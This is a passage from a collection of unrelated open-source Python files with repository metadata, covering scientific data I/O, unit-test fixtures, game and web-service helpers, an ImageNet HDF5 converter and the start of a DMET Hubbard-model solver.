# Install new dataset as new last dataset
last_dataset = new_dataset
if error:
raise RuntimeError(error)
| haavee/jiveplot | postprocessing/compare_data.py | Python | gpl-3.0 | 3,436 |
import random
BOARD = ['a1', 'a2', 'a3', 'b1', 'b2', 'b3', 'c1', 'c2', 'c3']
def play_turn(
player_role,
owned_by_x,
owned_by_zero
):
available_squares = list( set(BOARD) - set(owned_by_x) - set(owned_by_zero) )
return random.choice(available_squares)
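# Illustrative call (hypothetical board state, not part of the original bot):
#   play_turn('x', owned_by_x=['a1', 'b2'], owned_by_zero=['c3'])
# returns one of the six remaining squares at random, e.g. 'a3'.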
| rosedu/I.GameBot | tictactoe/game_bots/random_bot_02_python/tictactoe_play_turn.py | Python | agpl-3.0 | 293 |
from __future__ import annotations
def test_run(dials_regression, run_in_tmpdir):
from os.path import join
from dxtbx.model.experiment_list import ExperimentListFactory
from dials.array_family import flex
from dials.command_line.export import phil_scope
from dials.util.nexus import dump, load
path = join(dials_regression, "nexus_test_data")
# Read the experiments
experiments1 = ExperimentListFactory.from_json_file(
join(path, "refined_experiments.json")
)
# Read the reflections
reflections1 = flex.reflection_table.from_file(join(path, "integrated.pickle"))
# Delete some columns for the test
del reflections1["s1"]
del reflections1["zeta"]
del reflections1["background.mse"]
# Dump the reflections
params = phil_scope.extract()
params.nxs.hklout = "hklout.nxs"
dump(experiments1, reflections1, params.nxs)
# Load them again
experiments2, reflections2 = load("hklout.nxs")
EPS = 1e-7
# Check the reflections are OK
assert reflections1.nrows() == reflections2.nrows()
assert reflections1.ncols() == reflections2.ncols()
for key in reflections1.keys():
data1 = reflections1[key]
data2 = reflections2[key]
assert data1.__class__ == data2.__class__
if isinstance(data1, flex.double):
assert data1.all_approx_equal(data2)
elif isinstance(data1, flex.int6):
for p1, p2 in zip(data1.parts(), data2.parts()):
assert p1.all_eq(p2)
elif isinstance(data1, flex.vec3_double):
for p1, p2 in zip(data1.parts(), data2.parts()):
assert p1.all_approx_equal(p2)
else:
assert data1.all_eq(data2)
# Test passed
# Check the experiments are ok
assert len(experiments1) == len(experiments2)
exp1 = experiments1[0]
exp2 = experiments2[0]
# Check the beam
b1 = exp1.beam
b2 = exp2.beam
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(
b1.get_sample_to_source_direction(), b2.get_sample_to_source_direction()
)
)
assert abs(b1.get_wavelength() - b2.get_wavelength()) < EPS
assert abs(b1.get_polarization_fraction() - b2.get_polarization_fraction()) < EPS
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(b1.get_polarization_normal(), b2.get_polarization_normal())
)
# Check the goniometer
g1 = exp1.goniometer
g2 = exp2.goniometer
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(g1.get_rotation_axis(), g2.get_rotation_axis())
)
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(g1.get_fixed_rotation(), g2.get_fixed_rotation())
)
assert all(
abs(d1 - d2) < EPS
for d1, d2 in zip(g1.get_setting_rotation(), g2.get_setting_rotation())
)
# Check the scan
s1 = exp1.scan
s2 = exp2.scan
assert len(s1) == len(s2)
assert s1.get_image_range() == s2.get_image_range()
assert abs(s1.get_oscillation()[0] - s2.get_oscillation()[0]) < EPS
assert abs(s1.get_oscillation()[1] - s2.get_oscillation()[1]) < EPS
for e1, e2 in zip(s1.get_exposure_times(), s2.get_exposure_times()):
assert abs(e1 - e2) < EPS
for e1, e2 in zip(s1.get_epochs(), s2.get_epochs()):
assert abs(e1 - e2) < EPS
# Check the detector
d1 = exp1.detector
d2 = exp2.detector
assert len(d1) == len(d2)
for p1, p2 in zip(d1, d2):
assert p1.get_type() == p2.get_type()
assert p1.get_material() == p2.get_material()
assert p1.get_thickness() == p2.get_thickness()
assert p1.get_image_size() == p2.get_image_size()
assert p1.get_pixel_size() == p2.get_pixel_size()
assert p1.get_trusted_range() == p2.get_trusted_range()
for x1, x2 in zip(p1.get_fast_axis(), p2.get_fast_axis()):
assert abs(x1 - x2) < EPS
for x1, x2 in zip(p1.get_slow_axis(), p2.get_slow_axis()):
assert abs(x1 - x2) < EPS
for x1, x2 in zip(p1.get_origin(), p2.get_origin()):
assert abs(x1 - x2) < EPS
# Check the crystal
c1 = exp1.crystal
c2 = exp2.crystal
assert c1.get_space_group() == c2.get_space_group()
for p1, p2 in zip(c1.get_unit_cell().parameters(), c2.get_unit_cell().parameters()):
assert abs(p1 - p2) < EPS
for p1, p2 in zip(c1.get_A(), c2.get_A()):
assert abs(p1 - p2) < EPS
assert c1.num_scan_points == c2.num_scan_points
for i in range(c1.num_scan_points):
A1 = c1.get_A_at_scan_point(i)
A2 = c2.get_A_at_scan_point(i)
for a1, a2 in zip(A1, A2):
assert abs(a1 - a2) < EPS
uc1 = c1.get_unit_cell_at_scan_point(i)
uc2 = c2.get_unit_cell_at_scan_point(i)
for p1, p2 in zip(uc1.parameters(), uc2.parameters()):
assert abs(p1 - p2) < EPS
| dials/dials | tests/util/test_nexus.py | Python | bsd-3-clause | 4,907 |
'''
Created on Sep 27, 2013
@author: leal
Default JSON MESSAGES
'''
import ast
import logging
import config.config
logger = logging.getLogger(__name__)
class Messages(object):
'''
Helpers that build standard JSON success/error messages as dictionaries.
'''
messageTemplate = """{
'success' : '%r',
'message' : '%s',
'details' : %r
}"""
@staticmethod
def success(message,details=''):
messageAsStr = Messages.messageTemplate%(True,message,details)
logger.debug(messageAsStr)
messageAsDic = ast.literal_eval(messageAsStr)
return messageAsDic
@staticmethod
def error(message,details=''):
messageAsStr = Messages.messageTemplate%(False,message,details)
logger.debug(messageAsStr)
messageAsDic = ast.literal_eval(messageAsStr)
return messageAsDic
@staticmethod
def errorDetailed(message,complementaryMessage,value):
details = """{
'message' : %r,
'value' : %r
}"""%(complementaryMessage,value)
messageAsStr = Messages.messageTemplate%(False,message,
ast.literal_eval(details))
logger.debug(messageAsStr)
messageAsDic = ast.literal_eval(messageAsStr)
return messageAsDic
if __name__ == '__main__':
Messages.success("OK")
Messages.success("OK", "File received")
Messages.error("Error")
Messages.error("Error",details='There was an error processing XPTO.')
Messages.error("Error adding X.",details={'error' : 'xpto', 'valid' : [1,2,3]})
Messages.errorDetailed("Error adding X.","Valid values are", [1,2,3,5])
| ricleal/reductionServer | src/data/messages.py | Python | gpl-3.0 | 1,661 |
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('merek_harvester')
mobileTemplate.setLevel(63)
mobileTemplate.setDifficulty(Difficulty.NORMAL)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(False)
mobileTemplate.setScale(1)
mobileTemplate.setHideType("Leathery Hide")
mobileTemplate.setHideAmount(45)
mobileTemplate.setSocialGroup("merek")
mobileTemplate.setAssistRange(12)
mobileTemplate.setStalker(False)
mobileTemplate.setOptionsBitmask(Options.ATTACKABLE)
templates = Vector()
templates.add('object/mobile/shared_merek.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
attacks.add('bm_claw_4')
attacks.add('bm_damage_poison_4')
attacks.add('bm_damage_pain_4')
attacks.add('bm_slash_4')
mobileTemplate.setDefaultAttack('creatureMeleeAttack')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('merek_harvester', mobileTemplate)
return | agry/NGECore2 | scripts/mobiles/endor/merek_harvester.py | Python | lgpl-3.0 | 1,557 |
# DataviewMappingColumn.py
#
# Copyright 2019 OSIsoft, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# <http://www.apache.org/licenses/LICENSE-2.0>
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
class DataviewMappingColumn(object):
"""Sds dataview definition"""
@property
def Name(self):
return self.__name
@Name.setter
def Name(self, name):
self.__name = name
@property
def IsKey(self):
return self.__isKey
@IsKey.setter
def IsKey(self, isKey):
self.__isKey= isKey
@property
def DataType(self):
return self.__dataType
@DataType.setter
def DataType(self, dataType):
self.__dataType = dataType
@property
def MappingRule(self):
return self.__MappingRule
@MappingRule.setter
def MappingRule(self, MappingRule):
self.__MappingRule= MappingRule
def toJson(self):
return json.dumps(self.toDictionary())
def toDictionary(self):
# required properties
dictionary = { 'Name' : self.Name}
dictionary['IsKey'] = self.IsKey
if hasattr(self, 'DataType'):
dictionary['DataType'] = self.DataType
if hasattr(self, 'MappingRule'):
dictionary['MappingRule'] = self.MappingRule
return dictionary
@staticmethod
def fromJson(jsonObj):
return DataviewMappingColumn.fromDictionary(jsonObj)
@staticmethod
def fromDictionary(content):
dataviewMappingColumn = DataviewMappingColumn()
if len(content) == 0:
return dataviewMappingColumn
if 'Name' in content:
dataviewMappingColumn.Name = content['Name']
if 'IsKey' in content:
dataviewMappingColumn.IsKey = content['IsKey']
if 'DataType' in content:
dataviewMappingColumn.DataType = content['DataType']
if 'MappingRule' in content:
dataviewMappingColumn.MappingRule = content['MappingRule']
return dataviewMappingColumn
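# Illustrative round trip (column name and values are hypothetical):
# col = DataviewMappingColumn.fromDictionary({'Name': 'Timestamp', 'IsKey': True})
# col.toJson() -> '{"Name": "Timestamp", "IsKey": true}'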
| osisoft/Qi-Samples | ocs_samples/library_samples/Python3/ocs_sample_library_preview/Dataview/DataviewMappingColumn.py | Python | apache-2.0 | 2,497 |
import logging
import os
import simplejson as json
from tempfile import mkstemp
import unittest
from auslib.global_state import dbo, cache
from auslib.web.admin.base import app
from auslib.blobs.base import createBlob
def setUpModule():
# Silence SQLAlchemy-Migrate's debugging logger
logging.getLogger('migrate').setLevel(logging.CRITICAL)
class ViewTest(unittest.TestCase):
"""Base class for all view tests. Sets up some sample data, and provides
some helper methods."""
def setUp(self):
self.version_fd, self.version_file = mkstemp()
cache.reset()
cache.make_copies = True
app.config["SECRET_KEY"] = 'abc123'
app.config['DEBUG'] = True
app.config["WTF_CSRF_ENABLED"] = False
app.config['WHITELISTED_DOMAINS'] = {'good.com': ('a', 'b', 'c', 'd')}
app.config["VERSION_FILE"] = self.version_file
with open(self.version_file, "w+") as f:
f.write("""
{
"source":"https://github.com/mozilla/balrog",
"version":"1.0",
"commit":"abcdef123456"
}
""")
dbo.setDb('sqlite:///:memory:')
dbo.setDomainWhitelist({'good.com': ('a', 'b', 'c', 'd')})
dbo.create()
dbo.permissions.t.insert().execute(permission='admin', username='bill', data_version=1)
dbo.permissions.t.insert().execute(permission='permission', username='bob', data_version=1)
dbo.permissions.t.insert().execute(permission='release', username='bob',
options=dict(products=['fake', "a", 'b'], actions=["create", "modify"]), data_version=1)
dbo.permissions.t.insert().execute(permission='release_read_only', username='bob', options=dict(actions=["set"], products=["a", "b"]), data_version=1)
dbo.permissions.t.insert().execute(permission='rule', username='bob', options=dict(actions=["modify"], products=['a', "b"]), data_version=1)
dbo.permissions.t.insert().execute(permission='release', username='ashanti', options=dict(actions=["modify"], products=['a']), data_version=1)
dbo.permissions.t.insert().execute(permission="scheduled_change", username="mary", options=dict(actions=["enact"]), data_version=1)
dbo.permissions.t.insert().execute(permission='release_locale', username='ashanti',
options=dict(actions=["modify"], products=['a']), data_version=1)
dbo.permissions.t.insert().execute(permission='admin', username='billy',
options=dict(products=['a']), data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="bill", role="releng", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="bill", role="qa", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="bob", role="relman", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="julie", role="releng", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="mary", role="relman", data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="a", role="releng", signoffs_required=1, data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="e", role="releng", signoffs_required=1, data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="j", role="releng", signoffs_required=1, data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="k", role="relman", signoffs_required=1, data_version=2)
dbo.productRequiredSignoffs.history.t.insert().execute(change_id=1, changed_by="bill", timestamp=10, product="fake", channel="k", role="relman")
dbo.productRequiredSignoffs.history.t.insert().execute(change_id=2, changed_by="bill", timestamp=11, product="fake", channel="k", role="relman",
signoffs_required=2, data_version=1)
dbo.productRequiredSignoffs.history.t.insert().execute(change_id=3, changed_by="bill", timestamp=25, product="fake", channel="k", role="relman",
signoffs_required=1, data_version=2)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="fake", role="releng", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="bar", role="releng", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="blah", role="releng", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="doop", role="releng", signoffs_required=1, data_version=2)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="superfake", role="relman", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.history.t.insert().execute(change_id=1, changed_by="bill", timestamp=10, product="doop", role="releng")
dbo.permissionsRequiredSignoffs.history.t.insert().execute(change_id=2, changed_by="bill", timestamp=11, product="doop", role="releng",
signoffs_required=2, data_version=1)
dbo.permissionsRequiredSignoffs.history.t.insert().execute(change_id=3, changed_by="bill", timestamp=25, product="doop", role="releng",
signoffs_required=1, data_version=2)
dbo.releases.t.insert().execute(
name='a', product='a', data=createBlob(dict(name='a', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(
name='ab', product='a', data=createBlob(dict(name='ab', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(
name='b', product='b', data=createBlob(dict(name='b', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(
name='c', product='c', data=createBlob(dict(name='c', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(name='d', product='d', data_version=1, data=createBlob("""
{
"name": "d",
"schema_version": 1,
"hashFunction": "sha512",
"platforms": {
"p": {
"locales": {
"d": {
"complete": {
"filesize": 1234,
"from": "*",
"hashValue": "abc"
}
}
}
}
}
}
"""))
dbo.rules.t.insert().execute(
rule_id=1, priority=100, version='3.5', buildTarget='d', backgroundRate=100, mapping='c', update_type='minor',
product="a", channel="a", data_version=1
)
dbo.rules.t.insert().execute(
rule_id=2, alias="frodo", priority=100, version='3.3', buildTarget='d', backgroundRate=100, mapping='b', update_type='minor',
product="a", channel="a", data_version=1
)
dbo.rules.t.insert().execute(
rule_id=3, product='a', priority=100, version='3.5', buildTarget='a', backgroundRate=100, mapping='a', update_type='minor',
channel="a", data_version=1
)
dbo.rules.t.insert().execute(
rule_id=4, product='fake', priority=80, buildTarget='d', backgroundRate=100, mapping='a', update_type='minor', channel="a",
data_version=1
)
dbo.rules.t.insert().execute(
rule_id=5, priority=80, buildTarget='d', version='3.3', backgroundRate=0, mapping='c', update_type='minor',
product="a", channel="a", data_version=1
)
dbo.rules.t.insert().execute(rule_id=6, product='fake', priority=40, backgroundRate=50, mapping='a', update_type='minor', channel="e", data_version=1)
dbo.rules.t.insert().execute(rule_id=7, product='fake', priority=30, backgroundRate=85, mapping='a', update_type='minor', channel="c", data_version=1)
self.client = app.test_client()
def tearDown(self):
dbo.reset()
os.close(self.version_fd)
os.remove(self.version_file)
def _getBadAuth(self):
return {'REMOTE_USER': 'NotAuth!'}
def _getHttpRemoteUserAuth(self, username):
return {"HTTP_REMOTE_USER": username}
def _getAuth(self, username):
return {'REMOTE_USER': username}
def _get(self, url, qs={}, username=None):
environ_base = None
headers = {
"Accept-Encoding": "application/json",
"Accept": "application/json"
}
if username:
environ_base = self._getAuth(username)
ret = self.client.get(url, query_string=qs, headers=headers, environ_base=environ_base)
return ret
def _post(self, url, data={}, username='bill', **kwargs):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.post(url, data=json.dumps(data), content_type="application/json", environ_base=self._getAuth(username), **kwargs)
def _httpRemoteUserPost(self, url, username="bill", data={}):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.post(url, data=json.dumps(data), content_type="application/json", environ_base=self._getHttpRemoteUserAuth(username))
def _badAuthPost(self, url, data={}):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.post(url, data=json.dumps(data), content_type="application/json", environ_base=self._getBadAuth())
def _put(self, url, data={}, username='bill'):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.put(url, data=json.dumps(data), content_type="application/json", environ_base=self._getAuth(username))
def _delete(self, url, qs={}, username='bill'):
if type(qs) == dict:
qs["csrf_token"] = "lorem"
return self.client.delete(url, query_string=qs, environ_base=self._getAuth(username))
def assertStatusCode(self, response, expected):
self.assertEquals(response.status_code, expected, '%d - %s' % (response.status_code, response.data))
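# Illustrative subclass usage (endpoint is hypothetical):
# class RuleViewTest(ViewTest):
#     def testGetRules(self):
#         ret = self._get("/rules", username="bill")
#         self.assertStatusCode(ret, 200)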
| aksareen/balrog | auslib/test/admin/views/base.py | Python | mpl-2.0 | 10,366 |
""" Module for I/O
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
from builtins import super
import numpy as np
from astropy.table import Table
from scipy.interpolate import CubicSpline
from . import __path__
DATA_PATH = os.path.join(__path__[0], 'data')
def numpify_dict(d):
"""
Recursively make lists in a dictionary into numpy array
"""
def numpify(d):
for k, v in d.items():
if isinstance(v, list):
d[k] = np.array(v)
elif isinstance(v, dict):
numpify(v)
new_dict = d.copy()
numpify(new_dict)
return new_dict
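# Illustrative behaviour (example values):
# numpify_dict({'a': [1, 2], 'b': {'c': [3]}}) returns a dict whose 'a' and nested 'c'
# values are numpy arrays. Note the copy is shallow, so nested dicts are converted in
# place and remain shared with the caller's original dict.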
class Params(dict):
"""
Input parameters
"""
def __init__(self, ifile='ne2001_params.json', path=None, **new_params):
"""
"""
if path is None:
path = DATA_PATH
self.path = path
self.ifile = ifile
try:
params = numpify_dict(parse_json(os.path.join(self.path,
self.ifile)))
params['spiral_arms']['adict'] = init_spiral_arms()
except IOError:
params = {}
params.update(new_params)
super().__init__(params)
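# Illustrative usage (the override key is hypothetical):
# Params() loads DATA_PATH/ne2001_params.json (falling back to an empty dict on IOError)
# and behaves like a dict; keyword arguments override loaded entries, e.g.
# Params(thick_disk={'height': 0.95})['thick_disk'].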
def parse_json(json_file):
"Parse json file"
with open(json_file, 'rt') as json_data:
data = json.load(json_data)
return data
def read_galparam(ifile='gal_param.json'):
"""
Read Galaxy parameters
Parameters
----------
ifile : str, optional
Returns
-------
gal_param : dict
"""
old_param = parse_json(os.path.join(DATA_PATH, ifile))
gal_param = {}
gal_param['thick_disk'] = dict(e_density=(old_param['n1h1'] /
old_param['h1']),
height=old_param['h1'],
radius=old_param['A1'],
F=old_param['F1'])
gal_param['thin_disk'] = dict(e_density=old_param['n2'],
height=old_param['h2'],
radius=old_param['A2'],
F=old_param['F2'])
return gal_param
def read_gc(ifile='ne_gc.json'):
""" Read Galactic Center parameters
Returns
-------
gc_param : dict
dict of parameters
"""
old_param = parse_json(os.path.join(DATA_PATH, ifile))
gc_param = {}
gc_param['galactic_center'] = dict(e_density=old_param['negc0'],
center=tuple(old_param['centroid'].
values()),
F=old_param['Fgc0'],
height=old_param['hgc'],
radius=old_param['rgc'])
return gc_param
def read_lism(ifile='ne_lism.json'):
"""
Parameters
----------
ifile : str, optional
Returns
-------
lism_dict : dict
"""
# Read
with open(os.path.join(DATA_PATH, ifile), 'rt') as fh:
lism_dict = json.load(fh)
# Return
return lism_dict
def init_spiral_arms(ifile='ne_arms_log_mod.inp'):
armsinp = os.path.join(DATA_PATH, ifile)
# logarms = DATA_PATH + 'log_arms.out'
narms = 5
# integer armmap(5) ! for remapping from Wainscoat
# data armmap/1, 3, 4, 2, 5/ ! order to TC93 order, which is
# ! from GC outwards toward Sun.
armmap = [1, 3, 4, 2, 5]
NNj = [20, 20, 20, 20, 20]
narmpoints = 500
ncoord = 2
NNmax = 20
rad = 180/np.pi
# Arms
arms_tbl = Table.read(armsinp, format='ascii') # a, rmin, thmin, extent
assert len(arms_tbl) == narms
r1 = np.zeros((NNmax, narms))
th1 = np.zeros((NNmax, narms))
kmax = np.zeros(narms).astype(int)
arm = np.zeros((narms, narmpoints, ncoord))
for j, row in enumerate(arms_tbl):
th1[0:NNj[j], j] = (row['thmin'] +
np.arange(NNj[j])*row['extent']/(NNj[j]-1.)) # rad
r1[:, j] = row['rmin'] * np.exp((th1[:, j]-row['thmin'])/row['a'])
th1[:, j] *= rad # ! deg
# c *** begin sculpting spiral arm 2 == TC arm 3***
if armmap[j] == 3:
cut1 = (th1[:, j] > 370.) & (th1[:, j] <= 410.)
r1[cut1, j] *= (1. + 0.04 * np.cos((th1[cut1, j]-390.)*180 /
(40.*rad)))
# c . (1. + 0.01*cos((th1(n,j)-390.)*180./(40.*rad)))
cut2 = (th1[:, j] > 315.) & (th1[:, j] <= 370.)
r1[cut2, j] *= (1. - 0.07 * np.cos((th1[cut2, j]-345.)*180 /
(55.*rad)))
# c . (1.0 - 0.08*cos((th1(n,j)-345.)*180./(55.*rad)))
cut3 = (th1[:, j] > 180.) & (th1[:, j] <= 315.)
r1[cut3, j] *= (1 + 0.16 * np.cos((th1[cut3, j]-260.)*180 /
(135.*rad)))
# (1 + 0.13* np.cos((th1[cut3,j]-260.)*180./(135.*rad)))
# c *** begin sculpting spiral arm 4 == TC arm 2***
if armmap[j] == 2:
cut1 = (th1[:, j] > 290.) & (th1[:, j] <= 395.)
r1[cut1, j] *= (1. - 0.11 * np.cos((th1[cut1, j]-350.)*180 /
(105.*rad)))
# c *** end arm sculpting ***
"""
open(11,file=logarms, status='unknown')
write(11,*) 'arm n xa ya'
"""
# do 21 j=1,narms
for j in range(narms):
dth = 5.0/r1[0, j] # Python indexing
th = th1[0, j]-0.999*dth
# Generate spline
cspline = CubicSpline(th1[:NNj[j], j], r1[:NNj[j], j])
# call cspline(th1(1,j),r1(1,j),-NNj(j),th,r)
# for k in range(narmpoints):
# do 10 k=1,narmpoints-1
th = th + dth * np.arange(narmpoints)
gd_th = np.where(th <= th1[NNj[j]-1, j])[0]
kmax[j] = np.max(gd_th) + 1 # Python indexing (we will use arange)
r = cspline(th[gd_th])
# x,y of each arm
arm[j, gd_th, 0] = -r*np.sin(th[gd_th]/rad) # Python indexing
arm[j, gd_th, 1] = r*np.cos(th[gd_th]/rad)
# Wrap into a dict
arms_dict = {}
arms_dict['table'] = arms_tbl
arms_dict['r1'] = r1
arms_dict['th1'] = th1
arms_dict['kmax'] = kmax
arms_dict['narms'] = narms
arms_dict['narmpoints'] = narmpoints
arms_dict['armmap'] = armmap
arms_dict['arm'] = arm
return arms_dict
| benbaror/ne2001 | src/ne2001/ne_io.py | Python | bsd-2-clause | 6,520 |
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements writing of parsed, and possibly edited, test data back to files.
This functionality is used by :meth:`robot.parsing.model.TestCaseFile.save`
and indirectly by :mod:`robot.tidy`. External tools should not need to use
this package directly.
This package is considered stable, although the planned changes to
:mod:`robot.parsing` may affect also this package.
"""
from .datafilewriter import DataFileWriter
| alexandrul-ci/robotframework | src/robot/writer/__init__.py | Python | apache-2.0 | 1,065 |
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
#
import multiprocessing
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from pathlib import Path
import h5py
import numpy as np
from PIL import Image
from tqdm import tqdm
TRAIN_DIR = "train"
VAL_DIR = "val"
# TRAIN_DIR = "sz/160/train"
# VAL_DIR = "sz/160/val"
DATA_PATH = Path("~/nta/data/imagenet").expanduser()
TRAIN_PATH = DATA_PATH / TRAIN_DIR
VAL_PATH = DATA_PATH / VAL_DIR
TRAIN_FILES = TRAIN_PATH.glob("*/*.JPEG")
VAL_FILES = VAL_PATH.glob("*/*.JPEG")
HDF5_FILE = DATA_PATH / "imagenet.hdf5"
def resize(sz, image_path):
with Image.open(image_path) as img:
# Resize image preserving aspect ratio
w, h = img.size
ratio = min(h / sz, w / sz)
resized_img = img.resize((int(w / ratio), int(h / ratio)),
resample=Image.BICUBIC)
return resized_img
def hdf5_save(group_name, lock, image_path):
"""
Save imagenet images to HDF5
:param group_name: top level group name ("train", "val", etc)
:param lock: Lock object used to control write access to hdf5 file
:param image_path: Path object for the image file
"""
image_name = image_path.name
wnid = image_path.parent.name
image_data = image_path.read_bytes()
lock.acquire()
hdf5_file = h5py.File(name=HDF5_FILE, mode="a")
try:
main_group = hdf5_file.require_group(group_name)
wnid_group = main_group.require_group(wnid)
wnid_group.create_dataset(image_name, data=np.void(image_data))
finally:
hdf5_file.close()
lock.release()
return image_name
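# Illustrative read-back of one stored image (the wnid and file name are hypothetical):
# import io
# with h5py.File(HDF5_FILE, "r") as f:
#     raw = f["val"]["n01440764"]["ILSVRC2012_val_00000293.JPEG"][()]
#     img = Image.open(io.BytesIO(raw.tobytes()))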
def main():
with ProcessPoolExecutor(multiprocessing.cpu_count()) as executor, \
multiprocessing.Manager() as manager:
lock = manager.Lock()
hdf5_val = partial(hdf5_save, VAL_DIR, lock)
results = executor.map(hdf5_val, VAL_FILES)
for _ in tqdm(results, desc="Saving validation dataset"):
pass
hdf5_train = partial(hdf5_save, TRAIN_DIR, lock)
results = executor.map(hdf5_train, TRAIN_FILES)
for _ in tqdm(results, desc="Saving training dataset"):
pass
if __name__ == "__main__":
main()
| mrcslws/nupic.research | projects/imagenet/create_imagenet_hdf5.py | Python | agpl-3.0 | 3,040 |
'''
PyDMET: a python implementation of density matrix embedding theory
Copyright (C) 2014, 2015 Sebastian Wouters
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''
import HamInterface
import HamFull
import DMETham
import LinalgWrappers
import DMETorbitals
import SolveCorrelated
import MinimizeCostFunction
import DIIS
import numpy as np
class HubbardDMET:
def __init__( self, lattice_size, cluster_size, HubbardU, antiPeriodic, skew2by2cell=False ):
self.lattice_size = lattice_size
self.cluster_size = cluster_size
self.HubbardU = HubbardU
self.antiPeriodic = antiPeriodic
self.skew2by2cell = skew2by2cell
self.impurityOrbs = self.ConstructImpurityOrbitals()
self.impIndices = []
for count in range(0, len(self.impurityOrbs)):
if ( self.impurityOrbs[count] == 1 ):
self.impIndices.append( count )
self.impIndices = np.array( self.impIndices )
self.Ham = HamInterface.HamInterface(self.lattice_size, self.HubbardU, self.antiPeriodic)
def ConstructImpurityOrbitals( self ):
# Set the impurity orbitals lattice-style, e.g. impurityOrbs[row, col] = 1 for 2D lattice
impurityOrbs = np.zeros( self.lattice_size, dtype=int )
if ( self.skew2by2cell ):
impurityOrbs[0, 0] = 1
impurityOrbs[1, 0] = 1
impurityOrbs[1, 1] = 1
impurityOrbs[2, 1] = 1
else:
for count in range(0, np.prod( self.cluster_size )):
copycount = count
co = np.zeros([ len(self.cluster_size) ], dtype=int)
for dim in range(0, len(self.cluster_size )):
co[ dim ] = copycount % self.cluster_size[ dim ]
copycount = ( copycount - co[ dim ] ) / self.cluster_size[ dim ]
impurityOrbs[ tuple(co) ] = 1
impurityOrbs = np.reshape( impurityOrbs, ( np.prod( self.lattice_size ) ), order='F' ) # HamFull assumes fortran
return impurityOrbs
def SolveGroundState( self, Nelectrons, umat_guess=None ):
numImpOrbs = np.sum( self.impurityOrbs )
numBathOrbs = numImpOrbs
assert( Nelectrons % 2 == 0 )
numPairs = Nelectrons / 2
if ( umat_guess is None ):
# Start with a diagonal embedding potential
u_startguess = (1.0 * self.HubbardU * numPairs) / np.prod(self.lattice_size)
umat_new = u_startguess * np.identity( numImpOrbs, dtype=float )
else:
umat_new = np.array( umat_guess, copy=True )
print "DMET :: Starting guess for umat ="
print umat_new
normOfDiff = 1.0
threshold = 1e-6 * numImpOrbs
